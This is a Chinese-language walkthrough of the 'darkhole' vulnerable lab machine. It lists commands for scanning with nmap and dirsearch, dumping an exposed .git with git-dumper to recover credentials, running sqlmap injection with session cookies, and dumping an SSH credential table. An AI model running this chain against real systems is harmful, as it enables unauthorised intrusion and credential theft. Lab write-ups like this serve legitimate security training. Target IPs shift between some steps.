darkhole靶机

设置靶机与kali为同一网卡，这里设置的为NAT网卡。

查看靶机的MAC地址，并使用nmap扫描与kali同一网段内的IP地址

nmap 192.168.25.0/24

扫描出的MAC地址与靶机MAC地址对比，找到靶机IP

192.168.25.163

紧接着扫描全部端口信息

nmap 192.168.25.163

访问IP的80端口

进行信息收集一波，因为是靶机，没有资产信息，我们尝试寻找站点信息

发现页面什么也没有，尝试寻找页面的功能点

发现页面存在登陆字样，我们尝试访问

发现除了登陆框剩下什么都没有，我们进行目录扫描，查看有哪些目录。

dirsearch -u "http://192.168.25.163"

拼接/.git目录找到以下目录

http://192.168.25.163/.git/

在上述目录中查找，没有发现可用文件，这里我们尝试使用工具还原.git

百度寻找到kali中有git-dumper工具，使用此工具进行.git还原

我们使用工具git-dumper，发现不能用，我们安装以下git-dumper

pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.
tuna.tsinghua.edu.cn git-dumper

使用git-dumper下载git文件夹内容到git007文件夹

git-dumper   http://192.168.184.156/.git/   git007

切换到git007文件下查看日志

cd git007
ls
git log

这里出现了三次提交，且有加密

我们对比三次提交

git diff 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4
git diff a4d900a8d85e8938d3601f3cef113ee293028e10
git diff aa2a5f3aa15bb402f2b90a07d86af57436d64917

我们在第二次提交的日志中发现账号和密码

[email protected]
321

我们返回登陆页面尝试使用账号密码登陆

登陆成功，进来一眼就看到URL中的id=1

我们抓页面包，然后将包放入CO2中来一梭子sqlmap，发现存在SQL注入

设置参数 
sqlmap -u http://192.168.146.128/dashboard.php?id=1 --cookie='PHPSESSID=ogapihjks
384krpc7jb2tn0j6d'--batch

查询数据库

sqlmap -u http://192.168.146.128/dashboard.php?id=1 --cookie='PHPSESSID=ogapihjks
384krpc7jb2tn0j6d' --dbs

查看darkhole_2数据库下的表

sqlmap -u http://192.168.184.156/dashboard.php?id=1 --cookie PHPSESSID=hlsb2htuuob
9s86eafqjkpbh9f --batch -D darkhole_2 -tables

查看ssh表下数据

sqlmap -u http://192.168.184.156/dashboard.php?id=1 --cookie PHPSESSID=hlsb2htuuob9
s86eafqjkpbh9f --batch -D darkhole_2 -T ssh -dump

我们找到了ssh的账号密码，尝试连接

user：jehad 
pass：fool

连接成功，可以执行系统命令